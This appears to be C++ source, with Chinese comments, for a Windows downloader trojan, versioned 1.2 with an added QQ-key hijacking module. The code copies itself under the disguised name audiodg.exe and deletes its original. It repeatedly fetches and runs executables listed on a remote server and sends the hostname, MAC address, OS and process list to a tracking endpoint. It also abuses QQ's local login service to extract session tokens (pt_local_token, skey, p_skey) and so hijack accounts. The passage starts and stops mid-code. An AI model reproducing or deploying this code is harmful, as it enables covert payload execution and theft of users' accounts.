InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailablex, NULL, NULL);
// 读取返回的 Response 数据
char* lpBufferx = new char[dwNumberOfBytesAvailablex + 1]();
InternetReadFile(hHttpRequest, lpBufferx, dwNumberOfBytesAvailablex, &dwNumberOfBytesAvailablex);
// 输出 Response 数据
cout << "[+] Response Data:" << lpBufferx << "\r\n" << endl;
// 从返回数据中提取 ptsigx 备用
char* ptsigx = lpBufferx + dwNumberOfBytesAvailablex;
while (ptsigx != lpBufferx)
{
if (strstr(ptsigx, "check_sig?"))
{
ptsigx += sizeof("check_sig");
char* pEndBuffer = strstr(ptsigx, "'");
*pEndBuffer = 0;
break;
}
ptsigx--;
}
// 构造 ptsigx URL
CString szPtsigx = "";
szPtsigx.Format(TEXT("/check_sig?%s"), ptsigx);
cout << "[+] szPtsigx:" << szPtsigx << "\r\n" << endl;
delete[] lpBufferx;
// 读取整个Headers
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 提取 skey 的值
char* skey = lpHeaderBuffer + dwSizeOfRq;
while (skey != lpHeaderBuffer)
{
if (strstr(skey, "skey="))
{
skey += sizeof("skey");
char* pEndBuffer = strstr(skey, ";");
*pEndBuffer = 0;
break;
}
skey--;
}
// 关闭句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] Skey:" << skey << "\r\n" << endl;
}
}
}
}五次会话(获取 P_skey):
/* 五次会话 */
char *u_Ptsigx = szPtsigx.GetBuffer(szPtsigx.GetLength() + 1);
szPtsigx.ReleaseBuffer();
// 发送HTTPS请求
hHttpSession = InternetConnectA(hInternet, "ssl.ptlogin2.weiyun.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", u_Ptsigx, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);
if (bRet)
{
// 查询HTTP请求状态
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 读取整个Headers
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 提取 p_skey 的值
char* pskey = lpHeaderBuffer + dwSizeOfRq;
while (pskey != lpHeaderBuffer)
{
if (strstr(pskey, "p_skey="))
{
pskey += sizeof("p_skey");
char* pEndBuffer = strstr(pskey, ";");
*pEndBuffer = 0;
break;
}
pskey--;
}
cout << "[+] P_skey:" << pskey << "\r\n" << endl;
}
}
}
}代码更新 —— 2023.09.25 v1.2 版 (添加劫持QQ Key模块)
// downloader.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "downloader.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )
typedef BOOL(_stdcall *XXXCY)(LPCTSTR, LPCTSTR, BOOL);
typedef HINSTANCE(_stdcall *XXXCute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, int);
typedef HRESULT(_stdcall *XXXDL)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
typedef HINTERNET(_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET(_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
BOOL DelSelf();
BOOL DelTempFiles();
BOOL GetProcessName(LPCTSTR szProcess);
CString GetAllProcessNames();
BOOL DownloadToFile(TCHAR *szEXEURL, TCHAR *szEXESaveFile);
BOOL SendDataToCount();
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3);
void GetWinOS();
BOOL IsWow64OSEx();
CString GetMacAddress(void);
static DWORD WINAPI GetQQClientKey(LPVOID pParam);
TCHAR szLBFile[MAX_PATH] = "https://www.chwm.vip/load.swf"; // 远程列表文件地址
TCHAR szCountUrl[MAX_PATH] = "https://www.chwm.vip/count.php"; // 程序统计接口地址
TCHAR szVersion[MAX_PATH] = "1.2"; // 程序版本号
TCHAR szUserID[MAX_PATH] = "admin"; // 客户编号
TCHAR szLBSaveFile[MAX_PATH] = { 0 }; // 列表文件本地保存地址
TCHAR szEXESaveFile[MAX_PATH] = { 0 }; // 下载的程序保存路径
TCHAR szSelfFilePath[MAX_PATH] = { 0 }; // 程序自身路径
TCHAR szSelfSaveFile[MAX_PATH] = { 0 }; // 程序自身释放路径
TCHAR osx[MAX_PATH] = { 0 }; // 系统版本存放变量
TCHAR CGLB[10240] = { 0 }; // 分配 10M 内存来保存成功下载的地址
BOOL TJ = FALSE;
BOOL ReStart = FALSE;
// 唯一的应用程序对象
CWinApp theApp;
using namespace std;
int main(int argc, char *argv[])
{
CString Encryption_Point = "****** 2023.09.25 ******";
for (int i = 0; i < argc; i++)
{
if (strstr(argv[i], "ReStart"))
{
ReStart = TRUE;
}
}
///
// 获取程序自身路径
GetModuleFileName(NULL, szSelfFilePath, MAX_PATH);
///
// 获取系统相关配置目录路径
// CSIDL_LOCAL_APPDATA
// FOLDERID_LocalAppData
// 版本 5.0。 用作本地(非roaming) 应用程序的数据存储库的文件系统目录。
// 典型路径为 C:\Documents and Settings\username\Local Settings\Application Data
SHGetSpecialFolderPath(NULL, szLBSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
SHGetSpecialFolderPath(NULL, szEXESaveFile, CSIDL_LOCAL_APPDATA, TRUE);
SHGetSpecialFolderPath(NULL, szSelfSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
lstrcat(szLBSaveFile, "\\Temp\\Load.tmp");
lstrcat(szEXESaveFile, "\\Temp");
lstrcat(szSelfSaveFile, "\\Temp\\audiodg.exe");
if ( !ReStart )
{
///
// 获取目标文件或文件夹属性
DWORD dwFileAttr = GetFileAttributes(szSelfSaveFile);
// 判断属性是否为空
if (dwFileAttr == INVALID_FILE_ATTRIBUTES)
{
//复制自身
XXXCY cy;
HMODULE hkernel;
hkernel = LoadLibrary(_T("kernel32.dll"));
cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");
if (cy != NULL)
{
cy(szSelfFilePath, szSelfSaveFile, FALSE);
}
cy = NULL;
FreeLibrary(hkernel);
Sleep(500);
lstrcat(szSelfSaveFile, " ReStart");
WinExec(szSelfSaveFile, SW_SHOW);
DelSelf();
exit(0);
}
else
{
CString szSelfRandomName = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// 生成16位随机名称
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(100);
}
szSelfRandomName.Format(TEXT("\\%s.EXE"), szRand2);
TCHAR *szSelfRandomNames = szSelfRandomName.GetBuffer(szSelfRandomName.GetLength() + 1);
szSelfRandomName.ReleaseBuffer();
lstrcpy(szSelfSaveFile, szEXESaveFile);
lstrcat(szSelfSaveFile, szSelfRandomNames);
//复制自身
XXXCY cy;
HMODULE hkernel;
hkernel = LoadLibrary(_T("kernel32.dll"));
cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");
if (cy != NULL)
{
cy(szSelfFilePath, szSelfSaveFile, FALSE);
}
cy = NULL;
FreeLibrary(hkernel);
Sleep(500);
lstrcat(szSelfSaveFile, " ReStart");
WinExec(szSelfSaveFile, SW_SHOW);
DelSelf();
exit(0);
}
}
///
// 创建互斥 防止多次运行 //
///
SetLastError(0);
HANDLE g_hMutex = ::CreateMutex(NULL, FALSE, szUserID);
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
exit(0);
}
///
// 开始循环工作
do{
// 清理缓存
DelTempFiles();
// 下载远程列表文件
if ( DownloadToFile(szLBFile, szLBSaveFile) )
{
CString myText = NULL;
TCHAR Buffer[MAX_PATH] = { 0 };
FILE *TK = fopen(szLBSaveFile, "r+");
while (fgets(Buffer, sizeof(Buffer), TK) != NULL)
{
myText.Format("%s", Buffer);
//AfxMessageBox(myText);
CString szProcess = NULL, szURL = NULL;
// 标记出找到的第一个逗号在myText中的以0为初始索引的序号。
// 找不到返回-1值
int pos = myText.Find("|");
if (pos >= 0)
{
// 目标进程
// 把左边的第一段放到szProcess中
szProcess.Format("%s", myText.Left(pos));
//AfxMessageBox(szProcess);
// 下载地址
// 把除第一段剩下的放到szURL中
szURL.Format("%s", myText.Mid(pos + 1));
//AfxMessageBox(szURL);
TCHAR *TargetURL = szURL.GetBuffer(szURL.GetLength() + 1);
szURL.ReleaseBuffer();
// 判断成功列表里是否存在当前下载地址
if ( !strstr(CGLB, TargetURL) )
{
// 判断系统是否存在目标进程
if ( GetProcessName(szProcess) )
{
CString myEXESaveFile = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// 生成16位随机名称
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(100);
}
myEXESaveFile.Format(TEXT("%s\\%s.EXE"), szEXESaveFile, szRand2);
//AfxMessageBox(myEXESaveFile);
TCHAR *TargetFile = myEXESaveFile.GetBuffer(myEXESaveFile.GetLength() + 1);
myEXESaveFile.ReleaseBuffer();
// 下载指定 EXE 程序并运行
if ( DownloadToFile(TargetURL, TargetFile) )
{
HMODULE hshell;
hshell = LoadLibrary(_T("shell32.dll"));
XXXCute cute;
cute = (XXXCute)GetProcAddress(hshell, "ShellExecuteA");
if (cute != NULL)
{
HINSTANCE hNewExe = cute(NULL, "open", TargetFile, NULL, NULL, SW_SHOW);
if ((DWORD)hNewExe > 32)
{
// 成功下载并运行后
// 保存地址在成功列表
// 防止程序重复下载
lstrcat(CGLB, TargetURL);
}
}
cute = NULL;
FreeLibrary(hshell);
}
}
}
}
}
fclose(TK);
DeleteFile(szLBSaveFile);
}
if ( !TJ )
{
// 统计数据
if ( SendDataToCount() )
{
TJ = TRUE;
// 刷新系统图标缓存
SHChangeNotify(SHCNE_ASSOCCHANGED, SHCNF_FLUSHNOWAIT, NULL, NULL);
// 运行 GetQQClientKey 线程
DWORD dwThreadId1;
CreateThread(NULL, 0, GetQQClientKey, NULL, 0, &dwThreadId1);
}
}
// 延时一分钟
// 继续循环检测
Sleep(60000);
} while (1);
return 0;
}
BOOL DelSelf()
{
SHELLEXECUTEINFO sei;
TCHAR szModule[MAX_PATH], szComspec[MAX_PATH], szParams[MAX_PATH];
// Get its own file name Get the full path file name of CMD
if ((GetModuleFileName(0, szModule, MAX_PATH) != 0) &&
(GetShortPathName(szModule, szModule, MAX_PATH) != 0) &&
(GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) != 0)) {
lstrcpy(szParams, "/c del ");
lstrcat(szParams, "\"");
lstrcat(szParams, szModule);
lstrcat(szParams, "\"");
lstrcat(szParams, " > nul");
sei.cbSize = sizeof(sei);
sei.hwnd = 0;
sei.lpVerb = "Open";
sei.lpFile = szComspec;
sei.lpParameters = szParams;
sei.lpDirectory = 0; sei.nShow = SW_HIDE;
sei.fMask = SEE_MASK_NOCLOSEPROCESS;
if (ShellExecuteEx(&sei)) {
// Set the execution level of CMD process to NORMAL execution
SetPriorityClass(sei.hProcess, NORMAL_PRIORITY_CLASS);
// Set the priority of its own process high
SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
// Notify the windows resource
SHChangeNotify(SHCNE_DELETE, SHCNF_PATH, szModule, 0);
return TRUE;
}
}
return FALSE;
}
BOOL DelTempFiles()
{
ShellExecute(NULL, "open", "ipconfig.exe", " /flushdns", NULL, SW_HIDE);
BOOL bResult = FALSE;
BOOL bDone = FALSE;
LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;
DWORD dwTrySize, dwEntrySize = 4096; // start buffer size
HANDLE hCacheDir = NULL;
DWORD dwError = ERROR_INSUFFICIENT_BUFFER;
do
{
switch (dwError)
{
// need a bigger buffer
case ERROR_INSUFFICIENT_BUFFER:
delete[] lpCacheEntry;
lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];
lpCacheEntry->dwStructSize = dwEntrySize;
dwTrySize = dwEntrySize;
BOOL bSuccess;
if (hCacheDir == NULL)
bSuccess = (hCacheDir
= FindFirstUrlCacheEntry(NULL, lpCacheEntry,
&dwTrySize)) != NULL;
else
bSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);
if (bSuccess)
dwError = ERROR_SUCCESS;
else
{
dwError = GetLastError();
dwEntrySize = dwTrySize; // use new size returned
}
break;
// we are done
case ERROR_NO_MORE_ITEMS:
bDone = TRUE;
bResult = TRUE;
break;
// we have got an entry
case ERROR_SUCCESS:
// don't delete cookie entry
if (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))
DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
// get ready for next entry
dwTrySize = dwEntrySize;
if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))
dwError = ERROR_SUCCESS;
else
{
dwError = GetLastError();
dwEntrySize = dwTrySize; // use new size returned
}
break;
// unknown error
default:
bDone = TRUE;
break;
}
if (bDone)
{
delete[]lpCacheEntry;
if (hCacheDir)
FindCloseUrlCache(hCacheDir);
}
} while (!bDone);
return TRUE;
}
BOOL GetProcessName(LPCTSTR szProcess)
{
HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32x = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot, &pe32x))
{
CString TargetName = NULL;
TargetName.Format(TEXT("%s"), szProcess);
TargetName.MakeLower();
do {
CString ProcessName = NULL;
ProcessName.Format("%s", pe32x.szExeFile);
ProcessName.MakeLower();
if (ProcessName == TargetName)
{
CloseHandle(hShot);
return TRUE;
}
} while (Process32Next(hShot, &pe32x));
}
CloseHandle(hShot);
return FALSE;
}
CString GetAllProcessNames()
{
CString AllProcessNames = "";
HANDLE hShot2 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot2, &pe32))
{
do {
CString GetProcessName = "";
GetProcessName.Format(TEXT("%s"), pe32.szExeFile);
AllProcessNames += GetProcessName;
AllProcessNames += "|";
} while (Process32Next(hShot2, &pe32));
}
CloseHandle(hShot2);
return AllProcessNames;
}
BOOL DownloadToFile(TCHAR *szEXEURL, TCHAR *szEXESaveFile)
{
XXXDL kkkkkkk;
HMODULE hurlmon;
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szEXEURL, szEXESaveFile, 0, NULL);
if (hRes == S_OK)
{
return TRUE;
}
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
return FALSE;
}
BOOL SendDataToCount()
{
TCHAR dat[10240] = { 0 };
TCHAR jsj[MAX_PATH] = { 0 };
WSADATA _wsaData = { 0 };
ZeroMemory(dat, 10240 * sizeof(TCHAR));
ZeroMemory(jsj, MAX_PATH * sizeof(TCHAR));
int _Result = 0;
_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw1");
}
_Result = gethostname(jsj, sizeof(jsj));
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw2");
}
WSACleanup();
GetWinOS();
CString szMac = NULL;
szMac = GetMacAddress();
TCHAR *MAC = szMac.GetBuffer(szMac.GetLength() + 1);
szMac.ReleaseBuffer();
CString szProcess = NULL;
szProcess = GetAllProcessNames();
TCHAR *PROCESS = szProcess.GetBuffer(szProcess.GetLength() + 1);
szProcess.ReleaseBuffer();
// 构建统计数据
lstrcpy(dat, szCountUrl);
lstrcat(dat, "?jc=");
lstrcat(dat, PROCESS);
lstrcat(dat, "&ver=");
lstrcat(dat, szVersion);
lstrcat(dat, "&ID=");
lstrcat(dat, szUserID);
lstrcat(dat, "&MN=");
lstrcat(dat, jsj);
lstrcat(dat, "&os=");
lstrcat(dat, osx);
lstrcat(dat, "&mac=");
lstrcat(dat, MAC);
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, dat, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
char *myMSG1;
myMSG1 = strstr(buffer, "Fail");
char *myMSG2;
myMSG2 = strstr(buffer, "Success");
char *myMSG3;
myMSG3 = strstr(buffer, "Repeat");
if (myMSG1 || myMSG2 || myMSG3)
{
return TRUE;
}
else
{
// 由于提交的数据过长有时会导致统计失败
// 这里省去 szProcess 进程变量再重新统计
TCHAR postData[1024] = { 0 };
ZeroMemory(postData, 1024 * sizeof(TCHAR));
lstrcpy(postData, szCountUrl);
lstrcat(postData, "?ver=");
lstrcat(postData, szVersion);
lstrcat(postData, "&ID=");
lstrcat(postData, szUserID);
lstrcat(postData, "&CP=");
lstrcat(postData, jsj);
lstrcat(postData, "&os=");
lstrcat(postData, osx);
lstrcat(postData, "&mac=");
lstrcat(postData, MAC);
if ( PostDataToCount(postData, "Success", "Fail", "Repeat") )
{
return TRUE;
}
else
{
return FALSE;
}
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3)
{
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, szPostURL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
TCHAR *myMSG1;
myMSG1 = strstr(buffer, szState1);
TCHAR *myMSG2;
myMSG2 = strstr(buffer, szState2);
TCHAR *myMSG3;
myMSG3 = strstr(buffer, szState3);
if (myMSG1 || myMSG2 || myMSG3)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return TRUE;
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
void GetWinOS()
{
HKEY hKEY;
LPCTSTR data_Set = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
long ret0 = (RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY));
if (ret0 == ERROR_SUCCESS)
{
LPBYTE owner_Get1 = new BYTE[80];
DWORD type_1 = REG_SZ;
DWORD cbData_1 = 80;
ZeroMemory(osx, MAX_PATH * sizeof(TCHAR));
long ret1 = ::RegQueryValueEx(hKEY, "ProductName", NULL, &type_1, owner_Get1, &cbData_1);
if (ret1 == ERROR_SUCCESS)
{
char *OSVersion = (char *)owner_Get1;
lstrcpy(osx, OSVersion);
}
else
{
lstrcpy(osx, "Unknow System");
}
}
RegCloseKey(hKEY);
// 判断是否 64 位系统
if (IsWow64OSEx())
{
lstrcat(osx, " x64");
}
else
{
lstrcat(osx, " x86");
}
}
BOOL IsWow64OSEx()
{
typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
LPFN_ISWOW64PROCESS fnIsWow64Process;
BOOL bIsWow64 = FALSE;
fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandle("kernel32"), "IsWow64Process");
if (NULL != fnIsWow64Process)
{
fnIsWow64Process(GetCurrentProcess(), &bIsWow64);
}
return bIsWow64;
}
typedef struct _ASTAT_
{
ADAPTER_STATUS adapt;
NAME_BUFFER NameBuff[30];
}ASTAT, *PASTAT;
UCHAR GetAddressByIndex(int lana_num, ASTAT & Adapter)
{
UCHAR uRetCode;
NCB ncb;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBRESET;
ncb.ncb_lana_num = lana_num;
uRetCode = Netbios(&ncb);
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBASTAT;
ncb.ncb_lana_num = lana_num;
lstrcpy((char *)ncb.ncb_callname, "* ");
ncb.ncb_buffer = (unsigned char *)&Adapter;
ncb.ncb_length = sizeof(Adapter);
uRetCode = Netbios(&ncb);
return uRetCode;
}
CString GetMacAddress(void)
{
CString strMacAddress;
NCB ncb;
UCHAR uRetCode;
int num = 0;
LANA_ENUM lana_enum;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBENUM;
ncb.ncb_buffer = (unsigned char *)&lana_enum;
ncb.ncb_length = sizeof(lana_enum);
uRetCode = Netbios(&ncb);
if (uRetCode == 0)
{
num = lana_enum.length;
for (int i = 0; i < num; i++)
{
ASTAT Adapter;
if (GetAddressByIndex(lana_enum.lana[i], Adapter) == 0)
{
strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"),
Adapter.adapt.adapter_address[0],
Adapter.adapt.adapter_address[1],
Adapter.adapt.adapter_address[2],
Adapter.adapt.adapter_address[3],
Adapter.adapt.adapter_address[4],
Adapter.adapt.adapter_address[5]);
}
}
}
return strMacAddress;
}
static DWORD WINAPI GetQQClientKey(LPVOID pParam)
{
do{
// 查找 QQ.exe 进程
if ( GetProcessName("qq.exe") )
{
// 初始化URL
URL_COMPONENTSA crackedURL = { 0 };
char URL_STRING[] = "https://ssl.xui.ptlogin2.weiyun.com/cgi-bin/xlogin?appid=527020901&daid=372&low_login=0&qlogin_auto_login=1&s_url=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&style=20&hide_title=1&target=self&link_target=blank&hide_close_icon=1&pt_no_auth=1";
char szHostName[128] = { 0 };
char szUrlPath[256] = { 0 };
crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);
crackedURL.lpszHostName = szHostName;
crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);
crackedURL.lpszUrlPath = szUrlPath;
crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);
InternetCrackUrlA(URL_STRING, (DWORD)strlen(URL_STRING), 0, &crackedURL);
// 初始化会话
HINTERNET hInternet = InternetOpenA("Microsoft Internet Explorer", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (hInternet != NULL) {
HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (hHttpSession != NULL) {
HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (hHttpRequest != NULL) {
BOOL bRet = FALSE;
// 发送HTTP请求
bRet = HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);
if (bRet) {
// 查询HTTP请求状态
DWORD dwRetCode = 0;
DWORD dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet) {
// 读取整个Headers
char lpHeaderBuffer[1024] = { 0 };
dwSizeOfRq = 1024;
HttpQueryInfo(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 提取 pt_local_token 的值
char* pt_local_token = lpHeaderBuffer + dwSizeOfRq;
while (pt_local_token != lpHeaderBuffer) {
if (strstr(pt_local_token, "pt_local_token=")) {
pt_local_token += sizeof("pt_local_token");
char* pEndBuffer = strstr(pt_local_token, ";");
*pEndBuffer = 0;
break;
}
pt_local_token--;
}
// 关闭句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] pt_local_token:" << pt_local_token << "\r\n" << endl;
/* 二次会话 */
//生成16位随机数
time_t seed = time(NULL);
srand((unsigned)seed);
CString szRand1 = "", szRand2 = "";
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 5 + 48);
break;
default:
szRand1.Format("%C", rand() % 5 + 53);
}
szRand2 += szRand1;
Sleep(50);
}
char *szRandNum = szRand2.GetBuffer(szRand2.GetLength() + 1);
szRand2.ReleaseBuffer();
// 初始化URL参数
char lpszUrlPath[1024] = { 0 };
strcat(lpszUrlPath, "/pt_get_uins?callback=ptui_getuins_CB&r=0.");
strcat(lpszUrlPath, szRandNum); // 追加16位随机数
strcat(lpszUrlPath, "&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token); // 追加pt_local_token
// 建立会话
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// 发送HTTP请求,添加头信息
char lpHeaders[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";
bRet = HttpSendRequestA(hHttpRequest, lpHeaders, strlen(lpHeaders), NULL, 0);
if (bRet)
{
// 查询HTTP请求状态
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 获取返回数据的大小
DWORD dwNumberOfBytesAvailable = 0;
bRet = InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailable, NULL, NULL);
if (bRet)
{
// 读取网页内容
char* lpBuffer = new char[dwNumberOfBytesAvailable + 1]();
bRet = InternetReadFile(hHttpRequest, lpBuffer, dwNumberOfBytesAvailable, &dwNumberOfBytesAvailable);
if (bRet)
{
// 提取 QQ uin
char* uin = lpBuffer + dwNumberOfBytesAvailable;
while (uin != lpBuffer)
{
if (strstr(uin, "\"uin\":"))
{
uin += sizeof("\"uin\":") - 1;
char* pEndBuffer = strstr(uin, "}");
*pEndBuffer = 0;
break;
}
uin--;
}
// 关闭句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] uin:" << uin << "\r\n" << endl;
delete[] lpBuffer;
/* 三次会话 */
// 构造 URL
ZeroMemory(lpszUrlPath, 1024);
strcat(lpszUrlPath, "/pt_get_st?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token);
// 发送HTTPS请求
